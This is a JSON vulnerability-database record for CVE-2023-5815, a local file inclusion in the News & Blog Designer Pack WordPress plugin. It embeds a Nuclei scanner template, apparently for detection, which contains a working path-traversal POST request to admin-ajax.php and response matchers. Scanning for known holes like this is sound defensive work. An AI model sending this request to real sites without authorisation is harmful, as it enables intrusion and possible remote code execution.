{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-5815/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-5815/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-5815/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-5815/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-5815/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-5815"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-5815"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-5815.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2023-5815\n\ninfo:\n  name: News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion\n  author: daffainfo\n  severity: high\n  description: |\n    The News & Blog Designer Pack WordPress plugin up to version 3.4.1 contains a remote code execution caused by local file inclusion in the bdp_get_more_post function, letting unauthenticated attackers include arbitrary PHP files, exploit requires AJAX request with crafted POST data.\n  impact: |\n    Attackers can include arbitrary PHP files, leading to remote code execution and full site compromise.\n  remediation: |\n    Update to the latest version beyond 3.4.1 or disable the vulnerable AJAX functionality.\n  reference:\n    - https://wordpress.org/plugins/blog-designer-pack/\n    - https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.1\n    cve-id: CVE-2023-5815\n    epss-score: 0.04262\n    epss-percentile: 0.90692\n    cpe: cpe:2.3:a:infornweb:news_\\&_blog_designer_pack:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: infornweb\n    product: news_\\&_blog_designer_pack\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/blog-designer-pack/\"\n  tags: cve,cve2023,wordpress,wp,wp-plugin,blog-designer-pack,lfi,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=bdp_get_more_post&shrt_param[design]=../../../../../wp-login\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"success\"'\n          - '\"data\"'\n          - 'wp-login'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - application/json\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502200c8d4e286f0ba3a7ccd45cd8348a92250400e49f6d06233bbe12ddf4e77d57680221009eae5e07464d886866c9568d8ba34183337413d8e4424416ecd4c1c3bc3a4c6f:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-5815"
}